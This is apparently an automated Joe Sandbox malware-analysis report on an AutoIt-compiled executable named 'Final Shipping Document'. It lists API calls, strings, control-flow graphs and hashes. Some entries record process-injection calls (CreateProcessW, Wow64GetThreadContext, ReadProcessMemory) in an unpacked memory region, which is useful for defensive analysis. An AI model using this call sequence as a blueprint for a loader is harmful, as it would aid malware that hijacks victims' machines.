                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                            • String ID: TaskbarCreated
                                                            • API String ID: 129472671-2362178303
                                                            • Opcode ID: f1a4f549b30cd9926737be490e783fd32bc2c464b33c2c5f08f3763e620db56d
                                                            • Instruction ID: fed6f469296af68d4a6d5b11d7fa5aeec69ba4551373413fec8a8a573b160c78
                                                            • Opcode Fuzzy Hash: f1a4f549b30cd9926737be490e783fd32bc2c464b33c2c5f08f3763e620db56d
                                                            • Instruction Fuzzy Hash: 4B413B3125C304ABDF145B7C9C8EB7D3AD9E747B40F0841A6FE0AA61A1CB71CE8097A1

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                             control_flow_graph 499 bd8d45-bd8d55 500 bd8d6f-bd8d71 499->500 501 bd8d57-bd8d6a call bcf2c6 call bcf2d9 499->501 502 bd90d9-bd90e6 call bcf2c6 call bcf2d9 500->502 503 bd8d77-bd8d7d 500->503 515 bd90f1 501->515 520 bd90ec call bd27ec 502->520 503->502 505 bd8d83-bd8dae 503->505 505->502 509 bd8db4-bd8dbd 505->509 513 bd8dbf-bd8dd2 call bcf2c6 call bcf2d9 509->513 514 bd8dd7-bd8dd9 509->514 513->520 518 bd8ddf-bd8de3 514->518 519 bd90d5-bd90d7 514->519 521 bd90f4-bd90f9 515->521 518->519 523 bd8de9-bd8ded 518->523 519->521 520->515 523->513 526 bd8def-bd8e06 523->526 528 bd8e08-bd8e0b 526->528 529 bd8e23-bd8e2c 526->529 532 bd8e0d-bd8e13 528->532 533 bd8e15-bd8e1e 528->533 530 bd8e2e-bd8e45 call bcf2c6 call bcf2d9 call bd27ec 529->530 531 bd8e4a-bd8e54 529->531 564 bd900c 530->564 536 bd8e5b-bd8e79 call bd3820 call bd29c8 * 2 531->536 537 bd8e56-bd8e58 531->537 532->530 532->533 534 bd8ebf-bd8ed9 533->534 539 bd8fad-bd8fb6 call bdf89b 534->539 540 bd8edf-bd8eef 534->540 568 bd8e7b-bd8e91 call bcf2d9 call bcf2c6 536->568 569 bd8e96-bd8ebc call bd9424 536->569 537->536 551 bd9029 539->551 552 bd8fb8-bd8fca 539->552 540->539 544 bd8ef5-bd8ef7 540->544 544->539 548 bd8efd-bd8f23 544->548 548->539 553 bd8f29-bd8f3c 548->553 556 bd902d-bd9045 ReadFile 551->556 552->551 558 bd8fcc-bd8fdb GetConsoleMode 552->558 553->539 559 bd8f3e-bd8f40 553->559 562 bd9047-bd904d 556->562 563 bd90a1-bd90ac GetLastError 556->563 558->551 565 bd8fdd-bd8fe1 558->565 559->539 560 bd8f42-bd8f6d 559->560 560->539 567 bd8f6f-bd8f82 560->567 562->563 572 bd904f 562->572 570 bd90ae-bd90c0 call bcf2d9 call bcf2c6 563->570 571 bd90c5-bd90c8 563->571 566 bd900f-bd9019 call bd29c8 564->566 565->556 573 bd8fe3-bd8ffd ReadConsoleW 565->573 567->539 575 bd8f84-bd8f86 567->575 568->564 569->534 570->564 582 bd90ce-bd90d0 571->582 583 bd9005-bd900b call bcf2a3 571->583 579 bd9052-bd9064 572->579 580 bd8fff GetLastError 573->580 581 bd901e-bd9027 573->581 575->539 585 bd8f88-bd8fa8 575->585 579->566 589 bd9066-bd906a 579->589 580->583 581->579 582->566 583->564 585->539 593 bd906c-bd907c call bd8a61 589->593 594 bd9083-bd908e 589->594 606 bd907f-bd9081 593->606 599 bd909a-bd909f call bd88a1 594->599 600 bd9090 call bd8bb1 594->600 604 bd9095-bd9098 599->604 600->604 604->606 606->566
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                             • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                             • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4fa0f0b2f0ffcb2065b278545131bc96c7c236314d823359dd445e6c09c2ad21
                                                            • Instruction ID: 7295aff2e4bcdf2238edd0132d2a23a8bba2a8a2fee7f410a3fd238b7029ab40
                                                            • Opcode Fuzzy Hash: 4fa0f0b2f0ffcb2065b278545131bc96c7c236314d823359dd445e6c09c2ad21
                                                            • Instruction Fuzzy Hash: 96C1D274A04289AFDB11DFA8D881BADFBF5EF09310F1441DAF519AB392E7309941CB61

                                                            Control-flow Graph

                                                            • Control-flow graph for the function at 15725f0 (graph rendering not reproduced); APIs referenced in the graph: CreateFileW, VirtualAlloc, ReadFile, FindCloseChangeNotification, VirtualFree
                                                            APIs
                                                            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 015726C1
                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 015728E7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFileFreeVirtual
                                                            • String ID:
                                                            • API String ID: 204039940-0
                                                            • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                            • Instruction ID: 5003291eff22007650d71c6b19e4cb77b85bb760cde675b6c9f655f7bc650b31
                                                            • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                            • Instruction Fuzzy Hash: 08A13874E00209EBDB14CFA4D995BEEBBB5FF48304F208559E601BB281D7759A81CFA0

                                                            Control-flow Graph

                                                            • Control-flow graph for the function at ba2c63 (graph rendering not reproduced); APIs referenced in the graph: CreateWindowExW (2 calls), ShowWindow (2 calls)
                                                            APIs
                                                            • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00BA2C91
                                                            • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00BA2CB2
                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA1CAD,?), ref: 00BA2CC6
                                                            • ShowWindow.USER32(00000000,?,?,?,?,?,?,00BA1CAD,?), ref: 00BA2CCF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Window$CreateShow
                                                            • String ID: AutoIt v3$edit
                                                            • API String ID: 1584632944-3779509399
                                                            • Opcode ID: e08e79312e522d4f92d1a19ae9dda4c1b07f8d77cd68cb702dbfefb17566e9ed
                                                            • Instruction ID: a48c3de1440006b2c8658a92cfc95de2b1ba6c8dbf49228059e5364e3d3a646d
                                                            • Opcode Fuzzy Hash: e08e79312e522d4f92d1a19ae9dda4c1b07f8d77cd68cb702dbfefb17566e9ed
                                                            • Instruction Fuzzy Hash: CEF0B7755503907AEB211B2BAC49F7F2EBDD7C6F50F05405AFD08A25B0C6615890DAB0

                                                            Control-flow Graph

                                                            • Control-flow graph for the function at 15723b0 (graph rendering not reproduced); APIs referenced in the graph: CreateFileW, VirtualAlloc, ReadFile, ExitProcess
                                                            APIs
                                                              • Part of subcall function 015722A0: Sleep.KERNELBASE(000001F4), ref: 015722B1
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 015724E2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFileSleep
                                                            • String ID: 3L0AO6LKPQJ14FYBUT7LKAV800B
                                                            • API String ID: 2694422964-224596028
                                                            • Opcode ID: 074dd1ead4a0f02db99a2a3cd11ecd41d83b46ae1f24693a7e7ce0de674681cf
                                                            • Instruction ID: 93eeba8a66dc25855d6c263d5992cadfceba70170e9ace8ac6530fe69bb8452b
                                                            • Opcode Fuzzy Hash: 074dd1ead4a0f02db99a2a3cd11ecd41d83b46ae1f24693a7e7ce0de674681cf
                                                            • Instruction Fuzzy Hash: 78518170D04288EAEF12D7B4D859BDEBBB8AF15304F044189E6497B2C1D7B90B49CBA5

                                                            Control-flow Graph

                                                            APIs
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12C05
                                                            • DeleteFileW.KERNEL32(?), ref: 00C12C87
                                                            • CopyFileW.KERNELBASE(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C12C9D
                                                            • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12CAE
                                                            • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C12CC0
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: File$Delete$Copy
                                                            • String ID:
                                                            • API String ID: 3226157194-0
                                                            • Opcode ID: 59496e6ddbeaa9b50094b7534cae816cb40c50057998d62110f179e95ed37b93
                                                            • Instruction ID: bd187421c508937b840c64f8433b0d8881b8d8373cfcb53ef35fcc95b7bbad11
                                                            • Opcode Fuzzy Hash: 59496e6ddbeaa9b50094b7534cae816cb40c50057998d62110f179e95ed37b93
                                                            • Instruction Fuzzy Hash: 6FB16F75D00119ABDF21DBA4CC85EEEB7BDEF09350F1040AAF609E6141EB309B949FA1

                                                            Control-flow Graph

                                                            • Control-flow graph for the function at ba3b1c (graph rendering not reproduced); APIs referenced in the graph: RegOpenKeyExW, RegQueryValueExW, RegCloseKey
                                                            APIs
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00BA3B0F,SwapMouseButtons,00000004,?), ref: 00BA3B40
                                                            • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00BA3B0F,SwapMouseButtons,00000004,?), ref: 00BA3B61
                                                            • RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00BA3B0F,SwapMouseButtons,00000004,?), ref: 00BA3B83
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: Control Panel\Mouse
                                                            • API String ID: 3677997916-824357125
                                                            • Opcode ID: 49caf1a63d93ec09161174a6d7f9b2ec332523609fdd5cfde451a54102b63123
                                                            • Instruction ID: 0c6927233e4692cb64434c16aa44e2443da6f074418bf5b0aeb08b64548914fc
                                                            • Opcode Fuzzy Hash: 49caf1a63d93ec09161174a6d7f9b2ec332523609fdd5cfde451a54102b63123
                                                            • Instruction Fuzzy Hash: A5112AB5525208FFDB208FA5DC85AAEB7F9EF05B44B504499B805E7110D3319E4097A0
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(?,00000000), ref: 01571A5B
                                                            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01571AF1
                                                            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01571B13
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2039525570.0000000001570000.00000040.00001000.00020000.00000000.sdmp, Offset: 01570000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_1570000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                            • String ID:
                                                            • API String ID: 2438371351-0
                                                            • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                            • Instruction ID: b6efa4fe91f41b0bd0d2c77ed84b64e6651258aa2e29c9aaa6fb900417819102
                                                            • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                            • Instruction Fuzzy Hash: 5A622A30A14658DBEB24CFA4D881BDEB772FF58300F1095A9D20DEB290E7759E81CB59
                                                            Strings
                                                            • Variable must be of type 'Object'., xrefs: 00BF32B7
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: Variable must be of type 'Object'.
                                                            • API String ID: 0-109567571
                                                            • Opcode ID: 8a951210a1c9c6d492563c4e9adea352d58ef798e8b583a8aebd59e987b6c6aa
                                                            • Instruction ID: 382387238894c04fe7f9a963349100f74c9b6c0fee14a15923caecc386f0806f
                                                            • Opcode Fuzzy Hash: 8a951210a1c9c6d492563c4e9adea352d58ef798e8b583a8aebd59e987b6c6aa
                                                            • Instruction Fuzzy Hash: 70C28A70A04215CFCB24CF58C880AADB7F1FF4A710F2485A9E926AB391D775ED85CB91
                                                            APIs
                                                            • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00BE33A2
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00BA3A04
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: IconLoadNotifyShell_String_wcslen
                                                            • String ID: Line:
                                                            • API String ID: 2289894680-1585850449
                                                            • Opcode ID: f38900992add9bfb84e0b55fab700f512ff6fa5789edb3ba6d662f4647406c4a
                                                            • Instruction ID: bc1af932e88dc4e4eba3c59e283edf7264fb9ff1b7280e22c5e18049e9a22422
                                                            • Opcode Fuzzy Hash: f38900992add9bfb84e0b55fab700f512ff6fa5789edb3ba6d662f4647406c4a
                                                            • Instruction Fuzzy Hash: BB31D47140C304AEC725EB24DC46FEFB7E8AB42B10F0845AEF599930A1DB749648C7D6
                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0668
                                                              • Part of subcall function 00BC32A4: RaiseException.KERNEL32(?,?,?,00BC068A,?,00C71444,?,?,?,?,?,?,00BC068A,00BA1129,00C68738,00BA1129), ref: 00BC3304
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00BC0685
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                            • String ID: Unknown exception
                                                            • API String ID: 3476068407-410509341
                                                            • Opcode ID: b8207ba0be40c2c61d871ba4bdf10d38eebc9eeb0d177ed9b3c284136d49cbc4
                                                            • Instruction ID: 806fa79cd8fadffe371e95eaee117b274694158504e1a5519fda6ae4af080b0d
                                                            • Opcode Fuzzy Hash: b8207ba0be40c2c61d871ba4bdf10d38eebc9eeb0d177ed9b3c284136d49cbc4
                                                            • Instruction Fuzzy Hash: 65F0FC3490020DF7CF10BA64DC86EAD77EC9E00710B6045F9B924D5591EF71DB5AC6D0
                                                            APIs
                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 00C1302F
                                                            • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 00C13044
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Temp$FileNamePath
                                                            • String ID: aut
                                                            • API String ID: 3285503233-3010740371
                                                            • Opcode ID: a3bc9d102db2f1da93c4cd97f8cbb5a34591bb6ac25c66c52ef82d6adf212780
                                                            • Instruction ID: 5a07b95d4f2a66afda7ab29d3332e4e06308f160628ce0ec83b9cd509334dc80
                                                            • Opcode Fuzzy Hash: a3bc9d102db2f1da93c4cd97f8cbb5a34591bb6ac25c66c52ef82d6adf212780
                                                            • Instruction Fuzzy Hash: 5AD05EB250032867DA30A7A4AC8EFCF3A6CDB04750F0002A1BA55E2091DAB59984CBD0
                                                            APIs
                                                            • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00C282F5
                                                            • TerminateProcess.KERNEL32(00000000), ref: 00C282FC
                                                            • FreeLibrary.KERNEL32(?,?,?,?), ref: 00C284DD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFreeLibraryTerminate
                                                            • String ID:
                                                            • API String ID: 146820519-0
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            APIs
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00BA1BF4
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000010,00000000), ref: 00BA1BFC
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00BA1C07
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00BA1C12
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000011,00000000), ref: 00BA1C1A
                                                              • Part of subcall function 00BA1BC3: MapVirtualKeyW.USER32(00000012,00000000), ref: 00BA1C22
                                                              • Part of subcall function 00BA1B4A: RegisterWindowMessageW.USER32(00000004,?,00BA12C4), ref: 00BA1BA2
                                                            • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00BA136A
                                                            • OleInitialize.OLE32 ref: 00BA1388
                                                            • CloseHandle.KERNEL32(00000000,00000000), ref: 00BE24AB
                                                            Similarity
                                                            • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                            • String ID:
                                                            • API String ID: 1986988660-0
                                                            APIs
                                                            • SetFilePointerEx.KERNELBASE(?,?,00000001,00000000,00000001,?,00000000), ref: 00BA556D
                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001), ref: 00BA557D
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            APIs
                                                            • FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00BD85CC,?,00C68CC8,0000000C), ref: 00BD8704
                                                            • GetLastError.KERNEL32(?,00BD85CC,?,00C68CC8,0000000C), ref: 00BD870E
                                                            • __dosmaperr.LIBCMT ref: 00BD8739
                                                            Similarity
                                                            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
                                                            • String ID:
                                                            • API String ID: 490808831-0
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,00C12CD4,?,?,?,00000004,00000001), ref: 00C12FF2
                                                            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00C12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C13006
                                                            • CloseHandle.KERNEL32(00000000,?,00C12CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C1300D
                                                            Similarity
                                                            • API ID: File$CloseCreateHandleTime
                                                            • String ID:
                                                            • API String ID: 3397143404-0
                                                            APIs
                                                            • __Init_thread_footer.LIBCMT ref: 00BB17F6
                                                            Similarity
                                                            • API ID: Init_thread_footer
                                                            • String ID: CALL
                                                            • API String ID: 1385522511-4196123274
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00C16F6B
                                                              • Part of subcall function 00BA4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00C71418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00BA4EFD
                                                            Similarity
                                                            • API ID: LibraryLoad_wcslen
                                                            • String ID: >>>AUTOIT SCRIPT<<<
                                                            • API String ID: 3312870042-2806939583
                                                            APIs
                                                            • GetOpenFileNameW.COMDLG32(?), ref: 00BE2C8C
                                                              • Part of subcall function 00BA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BA3A97,?,?,00BA2E7F,?,?,?,00000000), ref: 00BA3AC2
                                                              • Part of subcall function 00BA2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00BA2DC4
                                                            Similarity
                                                            • API ID: Name$Path$FileFullLongOpen
                                                            • String ID: X
                                                            • API String ID: 779396738-3081909835
                                                            Similarity
                                                            • API ID: __fread_nolock
                                                            • String ID: EA06
                                                            • API String ID: 2638373210-3962188686
                                                            APIs
                                                              • Part of subcall function 00BD2D74: GetLastError.KERNEL32(?,?,00BD5686,00BE3CD6,?,00000000,?,00BD5B6A,?,?,?,?,?,00BCE6D1,?,00C68A48), ref: 00BD2D78
                                                              • Part of subcall function 00BD2D74: _free.LIBCMT ref: 00BD2DAB
                                                              • Part of subcall function 00BD2D74: SetLastError.KERNEL32(00000000,?,?,?,?,00BCE6D1,?,00C68A48,00000010,00BA4F4A,?,?,00000000,00BE3CD6), ref: 00BD2DEC
                                                              • Part of subcall function 00BD2D74: _abort.LIBCMT ref: 00BD2DF2
                                                              • Part of subcall function 00BDCADA: _abort.LIBCMT ref: 00BDCB0C
                                                              • Part of subcall function 00BDCADA: _free.LIBCMT ref: 00BDCB40
                                                              • Part of subcall function 00BDC74F: GetOEMCP.KERNEL32(00000000), ref: 00BDC77A
                                                            • _free.LIBCMT ref: 00BDCA33
                                                            • _free.LIBCMT ref: 00BDCA69
                                                            Similarity
                                                            • API ID: _free$ErrorLast_abort
                                                            • String ID:
                                                            • API String ID: 2991157371-0
                                                            APIs
                                                            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00BA3908
                                                            Similarity
                                                            • API ID: IconNotifyShell_
                                                            • String ID:
                                                            • API String ID: 1144537725-0
                                                            APIs
                                                            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00BA949C,?,00008000), ref: 00BA5773
                                                            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00BA949C,?,00008000), ref: 00BE4052
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: 0a303f8f3dcd6b5e092387cf10bd4301f2acae67242518e11bdb325694d0de68
